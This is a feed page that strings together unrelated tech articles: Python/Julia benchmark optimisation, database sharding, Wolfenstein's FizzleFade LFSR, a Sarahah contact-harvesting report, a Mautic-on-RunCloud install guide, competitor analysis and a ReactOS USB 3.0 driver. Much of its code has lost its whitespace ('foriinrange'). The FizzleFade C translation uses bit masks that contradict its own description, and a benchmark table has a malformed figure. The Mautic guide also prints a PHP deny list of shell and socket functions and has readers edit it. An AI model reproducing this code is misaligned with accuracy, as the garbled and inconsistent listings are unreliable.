Not bad, four times faster than Cython, and 9 times faster than the original Python code! 

Can we do more?  One way to know is to profile the code.  The built-in %prun profiler is not precise enough here, and we must use a better profiler known as line_profiler.  It can be installed via pip:

pip install line_profiler

Once installed, we load it:

%load_ext line_profiler

We can then profile the function using a magic:

%lprun -s -f mandelperf_numba mandelperf_numba()

It outputs the following in a pop up window.

Timer unit: 1e-06 s

Total time: 0.003666 s
File: <ipython-input-102-e6043a6167d6>
Function: mandelperf_numba at line 11

Line #      Hits         Time  Per Hit   % Time  Line Contents
==============================================================
    11                                           def mandelperf_numba():
    12         1         1994   1994.0     54.4      r1 = np.linspace(-2.0, 0.5, 26)
    13         1          267    267.0      7.3      r2 = np.linspace(-1.0, 1.0, 21)
    14         1         1405   1405.0     38.3      return [mandel_numba(complex(r, i)) for r in r1 for i in r2]

We see that the bulk of the time is spent in the first and last lines of our mandelperf_numba() function.  The last line is a bit complex, let us break it into two pieces, and profile again:

defmandelperf_numba():
r1=np.linspace(-2.0,0.5,26)
r2=np.linspace(-1.0,1.0,21)
c3=[complex(r,i)forrinr1foriinr2]
return[mandel_numba(c)forcinc3]

Profiler output becomes

Timer unit: 1e-06 s

Total time: 0.002002 s
File: <ipython-input-113-ba7b044b2c6c>
Function: mandelperf_numba at line 11

Line #      Hits         Time  Per Hit   % Time  Line Contents
==============================================================
    11                                           def mandelperf_numba():
    12         1          678    678.0     33.9      r1 = np.linspace(-2.0, 0.5, 26)
    13         1          235    235.0     11.7      r2 = np.linspace(-1.0, 1.0, 21)
    14         1          617    617.0     30.8      c3 = [complex(r, i) for r in r1 for i in r2]
    15         1          472    472.0     23.6      return [mandel_numba(c) for c in c3]

We see that the calls to the function mandel_numba() takes only one fourth of the total time.  The rest of the time is spent in the mandelperf_numba() function.  Optimizing it is worthwhile.

Using Numpy Again

Using Cython isn't helping much here, and Numba does not apply.  One way out of this dilemma is to use Numpy again.  We will replace the following by Numpy code that produces an equivalent result.

    return [mandel_numba(complex(r, i)) for r in r1 for i in r2]

This code is building what is known as a 2D mesh.  It computes the complex number representation of points whose coordinates are given by r1 and r2.  Point Pij coordinates are r1[i] and r2[j]Pij is represented by the complex number r1[i] + 1j*r2[j] where the special constant 1j represents the unitary imaginary number i.

We can code this computation directly:

@jit
defmandelperf_numba_mesh():
width=26
height=21
r1=np.linspace(-2.0,0.5,width)
r2=np.linspace(-1.0,1.0,height)
mandel_set=np.empty((width,height),dtype=int)
foriinrange(width):
forjinrange(height):
mandel_set[i,j]=mandel_numba(r1[i]+1j*r2[j])
returnmandel_set

Note that I changed the return value to be a 2D array of integers.  That's closer to what we need if we were to display the result.

Timing it yields

10000 loops, best of 3: 126 µs per loop

We are about 50 times faster than the original Python code!  Julia takes 196 micro seconds on that benchmark, hence compiled Python is 60% faster.

[Edited on February 2, 2016].  We can do even better in Python, see How To Quickly Compute Mandelbrot Set In Python.

Vectorizing

Let us look at another example.  I am not sure about what is measured to be honest, but here is the code the Julia team used .

defparse_int():
foriinrange(1,1000):
n=random.randint(0,2**32-1)
s=hex(n)
m=int(s,16)
assertm==n

Actually Julia's team code has an extra instruction that strips the ending 'L' in case it is present.  That line is required for my Anaconda install, but it is not required for my Python 3 install, therefore I removed it.  The original code is:

defparse_int():
foriinrange(1,1000):
n=random.randint(0,2**32-1)
s=hex(n)
ifs[-1]=='L':
s=s[0:-1]
m=int(s,16)
assertm==n

Timing the modified code yields:

100 loops, best of 3: 3.29 ms per loop

Neither Numba nor Cython seem to help.

As I was puzzled by this benchmark, I profiled the original code.  Here is the result:

Timer unit: 1e-06 s

Total time: 0.013807 s
File: <ipython-input-3-1d995505b176>
Function: parse_int at line 1

Line #      Hits         Time  Per Hit   % Time  Line Contents
==============================================================
     1                                           def parse_int():
     2      1000          699      0.7      5.1      for i in range(1,1000):
     3       999         9149      9.2     66.3          n = random.randint(0,2**32-1)
     4       999         1024      1.0      7.4          s = hex(n)
     5       999          863      0.9      6.3          if s[-1]=='L':
     6                                                       s = s[0:-1]
     7       999         1334      1.3      9.7          m = int(s,16)
     8       999          738      0.7      5.3          assert m == n

 

We see that most of the time is in generating the random numbers.  I am not sure this was the intent of the benchmark...

One way to speed this is to use the Numpy random generator.  Given Numpy uses C ints, we must limit the largest value to 2^31 - 1.  The code becomes:

defparse_int1_numpy():
foriinrange(1,1000):
n=np.random.randint(0,2**31-1)
s=hex(n)
m=int(s,16)
assertm==n

Timing it yields

1000 loops, best of 3: 1.05 ms per loop

Not bad, more than 3 times faster!  Appmying Numba doe snot help, but cython provides some further improvement:

@cython.boundscheck(False)
@cython.wraparound(False)
cpdefparse_int_cython_numpy():
cdef:
inti,n,m
foriinrange(1,1000):
n=np.random.randint(0,2**31-1)
m=int(hex(n),16)
assertm==n

Fiming it yields:

1000 loops, best of 3: 817 µs per loop

One way to further speed this up is to move the generation of random numbers out of the loop using Numpy.  We create an array of random numbers in one step. 

defparse_int_vec():
n=np.random.randint(2^31-1,size=1000)
foriinrange(1,1000):
ni=n[i]
s=hex(ni)
m=int(s,16)
assertm==ni

Timing it yields:

1000 loops, best of 3: 848 µs per loop

Not bad, 4 times faster than the original code, and close to the Cython code speed.

Once we have an array it seems silly to loop over it to apply the hex() and the int() functions one element at a time.  Good news it that Numpy provides a way to apply functions to an array rather than in a loop, namely the numpy.vectorize() function.  This function takes as input a function that operate one one object at a time  It returns a new function that operates on an array.

vhex=np.vectorize(hex)
vint=np.vectorize(int)

defparse_int_numpy():
n=np.random.randint(0,2**31-1,1000)
s=vhex(n)
m=vint(s,16)
np.all(m==n)
returns

This code runs a bit faster, and nearly as fast as the Cython code:

1000 loops, best of 3: 733 µs per loop

Cython can be used to speed this up.

%%cython
importnumpyasnp
importcython

@cython.boundscheck(False)
@cython.wraparound(False)
cpdefparse_int_vec_cython():
cdef:
inti,m
int[:]n
n=np.random.randint(0,2**31-1,1000)
foriinrange(1,1000):
m=int(hex(n[i]),16)
assertm==n[i]

Timing it yields.

1000 loops, best of 3: 472 µs per loop

Summary

We have described above how to speed up 4 of the examples used by the Julia team.  There are 3 more:

  • pisum can run 29 times faster with Numba. 
  • randmatstat can be made 2 times faster by better use of Numpy. 
  • randmatmul is so simple that no tool can be applied to it. 

The notebook containing complete code for all 7 examples is available on github and on nbviewer.

Let's summarize in a table where we are.  We display the speedup we get between the original Python code and the optimized one.  We also display the tools we used  for each of the benchmark example used by the Julia team.

 

Time in micro seconds Julia

Python

Optimized

Python Original Julia / Python Optimized Numpy Numba Cython

Fibonacci
64 bits

80 24 NA 3.8     X
Fib BigInt 12,717 1,470 3,770 8.7      
quicksort 419 306 17,700 1.4 X   X
Mandelbrot 196 126 6,570 1.6 X X  
pisum 34,783 20,400 926,000 1.7   X  
randmatmul 95,975 83,7000 83,700 1.1 X    
parse int 244 472 3,290 0.5 X   X
randmatstat 14,544 83,200 160,000 0.2 X    

 

This table shows that optimized Python code is faster than Julia for the first 6 examples, and slower for the last 2.  Note that for Fibonacci I used the recursive code to be fair.  

I do not think that these micro benchmarks provide a definite answer about which language is fastest.  For instance, the randmatstat example deals with 5x5 matrices.  Using Numpy arrays for that is an overkill.  One should benchmark with way larger matrices. 

I believe that one should benchmark languages on more complex code.  A good example is given in Python vs Julia - an example from machine learning.  In that article, Julia seems to outperform Cython.  If I have time I'll give it a try with Numba.

Anyway, it is fair to say that on the micro benchmark, Python performance matches Julia performance when the right tools are used.  Conversely, we can also say that Julia's performance matches that of compiled Python.  This in itself is interesting given Julia does it without any need to annotate or modify the code.

Takeway

Let's pause for a moment.  We have seen a number of tools that should be used when Python code performance is critical:

  • Profiling with line_profiler.
  • Writing better Python code to avoid unnecessary computation.
  • Using vectorized operations and broadcasting with Numpy.
  • Compiling with Cython or Numba.

Use these tools to get a feel of where they are useful.  At the same time, use these tools wisely.  Profile your code so that you can focus on where optimization is worth it.  Indeed, rewriting code to make it faster can sometime obfuscate it or make it less versatile.  Therefore, only do this when the resulting speedup is worth it.   Donald Knuth once captured nicely this advice :

” We should forget about small efficiencies, say about 97% of the time: premature optimization is the root of all evil.”

Note however that Knuth's quote does not mean optimization isn't worth it, see for instance Stop Misquoting Donald Knuth! and The 'premature optimization is evil' myth

Python code can, and should be, optimized when and where it makes sense.

Let me conclude with a list of interesting articles discussing the tools I used and more:

Update on August 2, 2016.  A reader, Ismael V.C. pointed me to the memoize function of Julia, and I updated the post accordingly.

Update on december 16, 2015. Python 3.4 has a built-in cache that can greatly speed up Fibonacci() function.  I updated the post to show its use.

Update on December 17, 2015.  Added running times for Julia 0.4.2 on the same machine where Python was run. 

Update on Feb 2, 2016.  Added the code on github and on nbviewer., and updated timings with Python 3.5.1.

Update on March 6, 2016.  Improved parse int code using Numpy.

 

Tags:&nbspnumpypythonnumbajuliacython

Sharding data models

$
0
0

When it comes to scaling your database, there are challenges but the good news is that you have options. The easiest option of course is to scale up your hardware. And when you hit the ceiling on scaling up, you have a few more choices: sharding, deleting swaths of data that you think you might not need in the future, or trying to shrink the problem with microservices.

Deleting portions of your data is simple, if you can afford to do it. Regarding sharding there are a number of approaches and which one is right depends on a number of factors. Here we’ll review a survey of five sharding approaches and dig into what factors guide you to each approach.

Sharding by customer or tenant

SaaS applications often serve many customers (called ‘tenants’), which is why we often refer to these apps as “multi-tenant applications.” If you’re a SaaS business, it’s often true that data from one customer doesn’t interact with data from any of your other customers. This is quite different from a social network which has a lot of interdependencies between the data generated by different users.

With a SaaS application that is multi-tenant, the data is usually transactional. It turns out paying customers don’t like it too much if you lose some of their data along the way. Due to the nature of many of these transactional, multi-tenant SaaS applications (think: CRM software, marketing operations, web analytics), you need strong guarantees that when data is saved to the database, the data is going to stay there. And your customers expect you to enforce referential integrity.

Another interesting thing about multi-tenant applications is that their data model evolves over time to provide more and more functionality. Unlike consumer apps which benefit from network effects to grow, a B2B application grows by adding new (ideally sticky) features for customers. And more often than not, new features mean new data models. The end result is 10s to 100s of tables, at times with complex joins. If this sounds like you, sharding by tenant is a safe (and recommended) approach.

Sharding by geography

Another class of applications that has come to the forefront in recent years are location-based apps that key off geography: thanks iPhone. Whether it’s Lyft, Instacart, or Postmates, these apps have an important tie to location. You’re not going to live in Alabama and order grocery delivery from California. And if you were to order a Lyft pick-up from California to Alabama you’ll be waiting a good little while for your pickup.

But, just because you have an app with a geographic slant to it, doesn’t mean geography is the right shard key. The key to sharding by region is that your data within a specific geography doesn’t interact with another geography. Not all apps with geographical data mean a geography sharding approach makes sense. Some apps that require data heavily interact across a defined geographical boundary (such as Foursquare) are less of a fit for sharding by geography.

Similar to the multi-tenant app above, data models for apps that depend on geographic location tend to be a bit more evolved. What I mean is, with apps that depend on location, you have a number of tables that have foreign key dependencies between each other and often join between each other on their queries. If you’re able to constrain your queries to a single geography and the data seldom crosses geographical boundaries, then sharding by geography can be a good approach for you.

Sharding by entity id (to randomly distributed data)

Our next data model can lend itself to a number of different database systems, this is because it doesn’t have strong interdependence between your data models (read: no joins). With a lack of a need for joins and often transactions in the same sense as a relational database there is a swath of databases that may or may not be able to help. The problem you’re solving for is that you have too much data for a single node (or core) to be able to process quickly.

When sharding by entity id,we want to distribute data as evenly as possible, to maximize the parallelism within our system. For a perfectly uniform distribution, you would shard by a random id, essentially round-robin’ing the data. Real life is a bit messier. While you may not have 50 tables with tight coupling between them, it’s very common to have 2-3 tables that you do want to join on. The most common place where we see the entity id model makes sense is a web analytics use case.

If your queries have no joins at all, then using a uuid to shard your data by can make a lot of sense. If you have a few basic joins that relate to perhaps a session, then sharding the related tables by that same shard key can be ideal. Sharing a shard key across tables allows you to co-locate data for more complicated reporting, while still providing a fairly even distribution for parallelism.

Sharding a graph

Now we come to perhaps the most unique approach. When looking at a graph data model you see different approaches to scaling and different opinions on how easy sharding can be. The graph model is most common in popular B2C apps like Facebook and Instagram, apps that leverage the social graph. Here the relationship between the edges between the data can be just as key in querying as the data itself. In this category graph databases start to stand on their own as a valid solution for social graphs and apps with very high connections between the data. If you want to dig in further, the Facebook paper on their internal datastore TAO is a good read.

With a graph database there are two key items, objects which are typed nodes and associations which designate the connection to them. For the object, an example might be that Craig checked in at Citus; and the association would be with Daniel, who subscribed to Craig’s updates. Objects are generally things that can recur, and associations capture things such as the who (who subscribed to updates, who liked, etc.)

With this model, data is often replicated in a few different forms. Then it is the responsibility of the application to map to the form that is most useful to acquire the data. The result is you have multiple copies for your data sharded in different ways, eventual consistency of data typically, and then have some application logic you have to map to your sharding strategy. For apps like Facebook and Reddit there is little choice but to take this approach, but it does come at some price.

Time partitioning

The final approach to sharding is one that certain apps naturally gravitate to. If you’re working on data where time is the primary axis, then partitioning by day, week, hour, month is right. Time partitioning is incredibly common when looking at some form of event data. Event data may include clicks/impressions of ads, it could be network event data, or data from a systems monitoring perspective. It turns out that most data has some type of time narrative to it, but does that make partitioning by time the right choice?

You will want to use a time-based approach to partitioning when:

  1. You generate your reporting/alerts by doing analysis on the data with time as one axis.
  2. You’re regularly rolling off data so that you have a limited retention of it.

An example where time partitioning does make sense is when you’re an ad network that only reports 30 days of data. Another example: you’re monitoring network logs and only looking at the last 7 days. The difficulty comes in when you have a mix of recent data (last 7 days) and historical data, say from a year ago.

The right approach to sharding depends on your application

As with many decisions about architecture and infrastructure, tradeoffs have to made and it’s best to match the approach to the needs of your application (and the needs of your customers!) In the case of sharding, matching the type of sharding to the needs of your application is key to being able to scale effectively. When you match your data model and use case to the right type of sharding, many of the hard issues like heavy investment to application re-writes, ensuring data consistency, and revisiting your problem when it’s gotten worse 6 months later can fade away.

Are you trying to figure out how to scale your database—and which type of sharding is right for you? We’re happy to help: drop us a note and let’s see if Citus is a good fit for you.

Hevea project: H-principle, visualization and applications

$
0
0
Hevea Project

Convex integration is a mathematical theory developed by Mikhaïl Gromov in order to solve partial differential equations. This theory shows that a certain principle, named homotopic principle or h-principle, is satisfied by many equations.

The Hévéa Project aims at showing that Convex integration provides an effective tool to build explicit solutions of fundamental geometric equations. Based on this effective tool, the Hévéa team has achieved in 2012 the first visualization of an isometric embedding of a flat torus.


FizzleFade

$
0
0

August 28th, 2017

I enjoy reading a lot of source code and after 15 years in the field I feel like I have seen my fair share. Even with a full-time job, I still try to spare evenings here and there to read. I don't see myself ever stopping. It is always an opportunity to learn new things to follow somebody's mind process.

Every once in a while I come across a solution to a problem that is so elegant, and so creative that there is no other word but "beautiful" to describe it. Q_rsqrt, better knows as "Inverse Square Root" and popularized by Quake 3, definitely belong to the family of breathtaking code. While I was working on the Game Engine Black Book: Wolfenstein 3D I came across an other one: Fizzlefade.

Fizzlefade is the name of the function in charge of fading from a scene to an other in Wolfenstein 3D. What it does is turn the pixels of the screen to a solid color, only one at a time, seemingly at random.

// What The Fizzle ?!

In Wolfenstein 3D, most screen transitions are done with a fade to black (by shifting the palette), there are two instances when the screen transitions via fizzling:

  • When dying
  • When killing a boss

Below are a series of screenshots to illustrate fizzling. During the transition, each pixel on the screen is turned to red (when dying) or blue (when dispatching a boss). Each pixel is written only once and seemingly at random.

To implement this effect, a naive approach would have been to use the pseudo random generator US_RndT and keep track of which pixels had been fizzled. However, this would make the fade non-deterministic with regard to duration and would also waste CPU cycles since the same pixel coordinates (X,Y) could come up several times. There is a much faster and more elegant way to implement a pseudo-random value generator. The code responsible for this effect can be found in id_vh.cpp, function FizzleFade. At first, it is not obvious how it works.


  boolean FizzleFade {long rndval =1;int x , y ;do{// seperate random value into x/y pairasmmovax,[WORDPTR rndval ]asmmovdx,[WORDPTR rndval +2]asmmovbx,axasmdecblasmmov[BYTEPTR y ],bl// low 8 bits - 1 = yasmmovbx,axasmmovcx,dxasmmov[BYTEPTR x ],ah// next 9 bits = xasmmov[BYTEPTR x +1],dl// advance to next random elementasmshrdx,1asmrcrax,1asmjncnoxorasmxordx,0x0001asmxorax,0x2000
      noxor :asmmov[WORDPTR rndval ],axasmmov[WORDPTR rndval +2],dxif(x > width || y > height )continue;
      fizzle_pixel (x , y );if( rndval ==1)return false ;// end sequence}while(1)}


If you can't read 16 bits TASM (I won't blame you), this is the C equivalent:

boolean fizzlefade(void){
    uint32_t rndval =1;
    uint16_t x,y;do{
       y = rndval &0x00F;/* Y = low 8 bits */
       x = rndval &0x1F0;/* X = High 9 bits */unsigned lsb = rndval &1;/* Get the output bit. */
       rndval >>=1;/* Shift register */if(lsb){/* If the output is 0, the xor can be skipped. */
            rndval ^=0x00012000;}if(x <320&& y <200)
          fizzle_pixel(x , y);}while(rndval !=1);return0;}

Which can be read as:

  • Initialize rndval to 1.
  • Break it down in 9 + 8 bits: use 8 bits to generate a Y coordinate and 9 bits for a X coordinate. Turn this pixel to red.
  • Subject rndval to a soup of XORing.
  • When rndval value is somehow back to 1: Stop, the screen is solid red.

This feels like dark magic. How is rndval supposed to return to value 1? That technique is called Linear Feedback Shift Register. The idea is to use one register to store a state, generate the next state, and also generate a value. To get the next value, you do a right shift. Since the rightmost bit disappears, a new one to the left is needed. To generate this new bit, the register uses "taps" which are bit offsets used to XOR together values and generate the new bit value. A Fibonnaci representation shows a simple LFSR with two taps.

This register (with taps on bit 0 and 2) is able to generate 6 values before it cycles back to it original state. The following listing shows all of them (the stars indicate the taps location).


   * * | value
  ======================
  0001 | 1
  1000 | 8
  0100 | 4
  1010 | A
  0101 | 5
  0010 | 2
  0001 | 1 -> CYCLE

  Sequence of 6 numbers before cycling .


Various arrangements of taps will produce different series. In the case of this four bits register, the maximum number of values in a series is 16-1 = 15 (zero cannot be reached.) This can be achieved with taps on bits 0 and 1. This is called a "Maximum-Length" LFSR.


    ** | value
  ======================
  0001 | 1
  1000 | 8
  0100 | 4
  0010 | 2
  1001 | 9
  1100 | C
  0110 | 6
  1011 | B
  0101 | 5
  1010 | A
  1101 | D
  1110 | E
  1111 | F
  0111 | 7
  0011 | 3
  0001 | 1 -> CYCLE

  Sequence of 15 numbers before cycling .

Wolf uses a 17 bits Maximum-Length LFSR with two taps to generate a serie of pseudorandom values. Of these 17 bits, on each iteration, 9 are used to generate a Y coordinate and 8 for a X coordinate. The corresponding pixel on screen is turned red/blue.

The Fibonacci representation helps to understand the general idea. But it is not how a LFSR is usually implemented in software. The reason is that it scales linearly with the number of taps. With four taps, you need three sequential XOR operations:

There is an alternative way to represent a LFSR called "Galois" which requires only one XOR regardless of the number of taps and it is the way Wolfenstein 3D writes 320x200=64000 pixels exactly once with deterministic duration.

Note : Because the effect works by plotting pixels individually, it was hard to replicate when developers tried to port the game to hardware accelerated GPU. None of the ports managed to replicate the fizzlefade except Wolf4SDL, which found a LFSR taps configuration to reach resolution higher than 320x200.

Note : The tap configuration on 17 bits generates 131,072 values before cycling. Since 320x200=64000, it could have been implemented with a 16 bits Maximum-length register with taps on 16,15,13 and 4 (in "Galois" notation.). My assumption is that LFSR literature was hard to come across in 1991/1992 and finding the correct tap for a 16 bit maximum length register was not worth the effort.


Recommended reading

Game Engine Black Book: Wolfenstein 3D

Comments

 

Fabien Sanglard @2017

The Sarahah App Has Been Secretly Saving All the Data in Your Address Book

$
0
0

Sarahah, the popular anonymous messaging app, built as a platform for honest feedback, has reportedly also been saving all the contacts in your phone.

It turns out, when you initially download and install the application, it saves and uploads your phone contacts and email addresses to the company’s servers, seemingly for no good reason. The behavior was first reported by The Intercept.

Sarahah’s founder, Zain Al-Abidin Tawfiq, tweeted in response to The Intercept’s article , saying that the contacts were being uploaded for a planned “find your friends” feature. The feature was then delayed due to “technical issues” and was accidentally not removed from the current version of the app. He added that “the data request will be removed on next update.”

The app doesn’t entirely hide that it’s interested in your contacts. On both iOS and Android, Sarahah asks for permission to access each user’s phone contacts – and even if you say no, you can still continue to use the app.

Zachary Julian, a senior security analyst at Bishop Fox, was the first to report the behavior to The Intercept. When he downloaded Sarahah to his Android phone, a monitoring software installed on the device alerted him to the fact that the app was uploading his private data. Julian reportedly found that the same occurs on iPhone, and that the app will also re-download all of your contacts if you haven’t accessed it on your phone in some time.

One of the most downloaded apps, Julian estimates that it is possible that Sarahah may have already harvested hundreds of millions of phone numbers and email addresses. Rest assured though (hopefully) – the app’s privacy policy notes that it will “will never sell the data you provide to any third party” without users’ prior and written consent unless part of bulk data used only for research and does not identify the user.

Earlier this year, users of the service Unroll.me grew upset when it was reported that the company sold their data to Uber. While this kind of activity is often covered in an app’s terms of service, that certainly doesn’t mean most users are going to be aware of it.

Sarahah’s founder makes it sound like the company isn’t doing anything with the data it collects. But either way, that information seems to be needlessly getting sent to a company’s server when it doesn’t really need to be.

What are your thoughts? Share them down below in the comments.

Help radiologists detect lung cancer earlier

$
0
0

We’re calling on a global community of data scientists, engineers, designers, and researchers to build an open source software application that brings advances from machine learning into the clinic. We’re not just optimizing an algorithm for a single metric—we’re collaborating to build tools which put AI in the hands of clinicians.

In addition to pushing forward the cutting-edge of open clinical software, top contributors will be eligible for a share of $100,000 in monetary prizes generously provided by the Bonnie J. Addario Lung Cancer Foundation.

Contribute now by grabbing an issue from the project's GitHub repository and submitting a PR!

Mining Bitcoin with pencil and paper: 0.67 hashes per day

$
0
0

If you are on a personal connection, like at home, you can run an anti-virus scan on your device to make sure it is not infected with malware.

If you are at an office or shared network, you can ask the network administrator to run a scan across the network looking for misconfigured or infected devices.

How to Install Mautic Marketing Automation Inside RunCloud Server

$
0
0

Mautic is a free and Open Source marketing automation software and it can monitor websites, create landing pages, send emails to make you grow your business.

This is the first time I heard about Mautic since our customers tried to follow the tutorials from LinuxBabe but unable to do it correctly. So I guess we will try to do another tutorial but with RunCloud. This tutorial also follows the LinuxBabe tutorial since I’ve never done this before.

As usual, create your web application inside RunCloud Panel and give it a name like the picture below.

Name: mautic-test (you can use any name that you want)
User: runcloud
PHPVersion: php 7.0

We are using PHP7.0 since Mautic don’t support PHP7.1 yet when this post was published. Please use your selected user in every step below.

Now SSH inside your server with the selected username, download the latest Mautic and extract it to the root web app folder.

# SSH into your server using the selected web app user
ssh runcloud@<ip address>

# Change the working directory to your web app root path
cd webapps/mautic-test

# Download the Mautic script. The download might be a bit slow. Just wait for it to finish
wget https://www.mautic.org/download/latest -O mautic.zip

# Unzip it
unzip mautic.zip

This is what I got when I try to open it from my browser

It will give you a recommendation to enable php_posix.

The php_posix is disabled by default inside RunCloud for security reason. For Mautic, it is just a recommendation, not a requirement. But if you really want to enable that, go to your web app setting and replace all the disable_functions with the text below.

getmyuid,passthru,leak,listen,diskfreespace,tmpfile,link,ignore_user_abord,shell_exec,dl,set_time_limit,exec,system,highlight_file,source,show_source,fpassthru,virtual,proc_open,proc_close,proc_nice,proc_terminate,escapeshellcmd,ini_alter,popen,pcntl_exec,socket_accept,socket_bind,socket_clear_error,socket_close,socket_connect,curl_multi_exec,symlink,ini_alter,socket_listen,socket_create_listen,socket_read,socket_create_pair,stream_socket_server

Save the web application and refresh your browser. You will see the recommendation section disappear.

Go to RunCloud Panel and create new database and user. I will use mautic for both database name and username. Don’t forget to attach the user to the database.

After you have done that, fill in the database installation inside Mautic as follows. Use 127.0.0.1 for database host because inside RunCloud, we are using TCP instead of UNIX socket for database.

After you have added the database, you will be greet with Mautic installation. This should be easy because it is how do you want Mautic to behave.

After you have setup everything inside the installer, login to the Dashboard and you will be greet with beautiful dashboard like the picture below.

When Mautic ask you which service do you want to use to send email, don’t use php mail. I’ve talk about this before inside the email blog post.

Please Spend Time with Competitor Analysis

$
0
0

Do like every great coach does, and get to know the tactics of the other team before getting into the match. Adjust tactics and figure out playing field positioning. Also, learn from others’ mistakes. For this reason, competitor analysis represents one of the most easily accessible methods to get a product on the right track.

Competitor analysis

And I can already hear why not to do this.

  • I don’t want to stalk others.
  • We should just focus on our own product and idea instead.
  • We are unique and have great ideas, so we don’t need anything else.
  • Everyone knows our competitors; there is no need to research common knowledge.
  • There is no time for that!

Many product people usually think this way, but after a while they face reality and look around at the market. They then learn a lot and come up with great new ideas. They learn from other’s mistakes, the cheapest way of learning. And in the end, they can put together a long-term strategy which will lead to victory.

Let’s face the harsh truth quickly: it’s a competitive world and everyone is constantly trying to find information on how their competitors work. Competitor analysis establishes what position in the market you occupy and helps you explore new opportunities to work on.

Competitor analysis: grouping competitors based on value propositions

Grouping competitors based on value propositions and features

How to start researching the competitors?

Start off easily with the basic things. Google still serves as the best tool for competitor research. Just sit down and start searching for different keywords related to your product. Also search the app store and other marketplaces for different solutions.

Competitors can be grouped into two main categories. The direct competitors solve the same problem, with the same value proposition for the same target group. The indirect competitors usually have similar value propositions, but for a different audience, or they target the same audience with different value propositions.

The biggest search engines provide basic examples for direct competition. Google Search and Bing offer the same solution for the same set of users. An encyclopedia, which works in a different way, also contains special pieces of information, so in this example it counts as indirect competition.

Also, for indirect competitors, think about how a business class trip competes with Skype or how Netflix competes with a movie theater. In the first case, the user wants to talk to somebody, in the second case to see a movie. So in a way, they aim for the same thing but in hugely different ways.

People usually use a part of an indirect competitor’s product to solve a problem if they don’t have a better tool built just for them. It’s important to know the workarounds people apply to a problem. That’s where a new tool can succeed.

So collect all competitors in a spreadsheet. Also look around and collect information about their companies and products. Trying out all their products works best.

Collect the following information about each competitor:

  • Name, url, direct or indirect status.
  • Summary: The main findings, the company’s value proposition, the target audience, the product, the big picture and the most interesting findings.
  • Pros: The advantages to their product or marketing, good solutions or design details to learn from.
  • Cons: Everything they suck at, usability issues, missing features; support forums and customer reviews are a good source.
  • Their revenue streams and marketing channels.
  • Numbers: Try to collect some data such as number of website visitors (Alexa, Compete.com, no problem if they are not accurate, they still compare each other), app downloads (AppAnnie, AppFigures, MopApp), social media followers (Facebook, Twitter, LinkedIn, Pinterest, YouTube), prices.

Competitor analysis spreadsheet

Example from a competitor analysis spreadsheet

Competitor analysis is not about copying others’ solutions

Although getting to know the competition gives invaluable help, think about their solutions and add more depth to the findings if time allows. Avoid mindless copying; no solution fits every product. One site’s high usability standards doesn’t necessarily translate to another’s designs.

Test everything in the context of its own target audience. Using design decisions because a bigger company made them can cause real harm in the long run. Also, good designers draw inspiration from others but don’t copy them.

User testing can reveal the problems right away. It can deliver rewarding information about issues the competitor has, but users can also give feature requests and other insights with a quick interview in addition to the actual testing.

What to look for in the gathered data?

After exploring all the competitors and assembling a huge spreadsheet full of data, do the analysis. First just scan through everything collected and try to mentally piece together the big picture. Look for three things:

  • Market gaps: An underserved segment, a problem that came up during product discovery and unsolved by others, or a new combination that would make sense.
  • What strategies work: From the numbers, guess how each company performs; what are the product or marketing strategies they use; why do the others trail behind?
  • New ideas: Does anything from other industries or apps suit this market; what idea or new solution does this market lack?

After considering all these things, define the productstrategy, or if it sounds better: The Master Plan. It identifies pains to solve, the competitive advantage on the market and steps to take to get there.

Aim to create value innovation. This happens in creating something better than the current solutions at a lower price.

Competing only with lower prices cannibalizes business. Someone will always do it cheaper. As prices drop and profits shrink, running the business gets harder and harder. Instead, create something better than the current solutions, or find a new market and build something for them. But the ultimate success comes with the two together: a better solution at a lower price.

The goal of competitor analysis is to create a product with huge value innovation

Examples of great value innovations

Uber managed to deliver lower prices than traditional taxi companies while also providing a better experience. The app shows where the car is coming from, allows driver ratings, and simplifies payments after receiving your card details the first time. Its huge success is no surprise. AirBnb works similarly: they provide a better experience, renting a normal apartment with a kitchen for less money than a small hotel room.

A clear industry overview and defined product strategy require thorough competitor analysis. Make time for it. Insights about the competitor’s whole product story do more. This information makes entering a new field with a product easier. So collect the direct and indirect competitors, get those spreadsheets up and running and gather the necessary data. And remember, design inspiration can help, but only use best practices when they really work for your target audience. If your strategy makes you happy and you feel fired up to start designing the product, that’s all right. We just have to do a few UX workshops to align the team and then we can let the fun begin.

The five basic steps to competitor analysis

Let’s do a quick recap! Remember these few steps and start conducting your own competitor analysis with ease:

  • Use Google to search for keywords related to your idea, learn about the other competitors on the market;
  • Group competitors as direct and indirect;
  • Try out their solutions;
  • Collect the basics about them in a spreadsheet;
  • Scan the collected information to get the big picture;
  • Share your findings with your team and hold a workshop to define your strategy together.

Have any experience or tips about doing competitor analysis? Please share them in the comments below.

Implementing your own USB 3.0 stack “HOW TO”

$
0
0

Link to my work:https://svn.reactos.org/svn/reactos/branches/GSoC_2017/usbxhci/reactos/drivers/usb/usbxhci/

Link to check out using svn:https://svn.reactos.org/reactos/branches/GSoC_2017/usbxhci/reactos/

All the commits log:https://svn.reactos.org/svn/reactos/branches/GSoC_2017/usbxhci/?view=log

https://code.reactos.org/changelog/~br=GSoC_2017/reactos/branches/GSoC_2017/usbxhci?max=30&view=fe

My aim is to develop driver for xHCI which is compatible with ReactOS. For the development I’ve used Windows 2003 server edition running on Vmware Workstation. The first link points to the folder in which all main code and header files are present. To view any file, click on it and in the log; against any revision, click on view/download to see the code. To get and compile my work please follow the instructions given in https://reactos.org/wiki/Building_ReactOS. Check out usbxhci branch from the link given above. To build the whole operating system use the commands given in the above link. To build only the xHCI driver use the command “ninja usbxhci” in the output folder(similar to “ninja livecd” example in the wiki).

Universal Serial Bus(USB) has 5 different modes of data transfer which are segregated based on the transfer speed, starting at low speed (USB 1.0) up to SuperSpeed+ (USB 3.1). xHCI stands for extensible host controller interface. Host Controller(HC) is the hardware that connects network devices or storage devices to the computer. A host controller interface (HCI) is a register-level interface that enables a HC for USB hardware to communicate with a HC driver in software. xHCI is a computer interface specification which is capable of interfacing with USB 1.x, 2.0 and 3.x compatible devices. The xHCI architecture was designed to support all USB speeds, including SuperSpeed (5 Gbit/s) and future speeds, under a single driver stack.

Major Components:

eXtenstible Host Controller Interface specification can be found on Intel website.

Image

The above figure shows xHCI general architecture. xHCI gives the register interface by which we can communicate with the hardware.

In figure there are 3 blocks PCI config space MMIO space and Memory Address Space. In general hardware is connected to PCI which is standardised form of processor bus; it connects to processor and memory. So from software point of view our first contact with the HC will be through PCI bus. Communication with PCI is done by its respective driver.  PCI driver provides the base address as can be seen in the image.

